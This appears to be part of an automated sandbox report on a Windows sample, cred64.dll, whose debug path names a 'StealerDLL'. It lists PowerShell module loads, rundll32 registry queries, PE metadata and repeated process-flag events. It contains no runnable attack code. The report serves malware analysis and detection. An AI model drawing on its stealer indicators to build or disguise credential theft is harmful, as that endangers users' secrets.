    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\OfficeJump to behavior
    Source: cred64.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
    Source: cred64.dll.dllStatic file information: File size 1281024 > 1048576
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: cred64.dll.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: cred64.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt+. source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Automation.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C321304000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000011.00000002.2070821730.000001934FCAE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: pdblib.pdb source: powershell.exe, 00000011.00000002.2064588985.000001934FA8B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2072598626.000001934FCE3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdbz source: powershell.exe, 00000015.00000002.2153160648.000001C32129C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000011.00000002.2074774615.000001934FD68000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000015.00000002.2153748068.000001C3212F3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.dll
    Source: Binary string: softy.pdbvice source: powershell.exe, 00000011.00000002.2073544837.000001934FD1C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbk source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdbA56-E329-4D4D1%0# source: powershell.exe, 00000015.00000002.2155215235.000001C321490000.00000004.00000020.00020000.00000000.sdmp
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: cred64.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: cred64.dll.dllStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B4D2785 push ebx; iretd 17_2_00007FFD9B4D290A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B4D28FA push ebx; iretd 17_2_00007FFD9B4D290A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B5AC2CB pushfd ; retn 0000h17_2_00007FFD9B5AC2E1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B5AC2E4 pushfd ; retn 0000h17_2_00007FFD9B5AC2E5

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
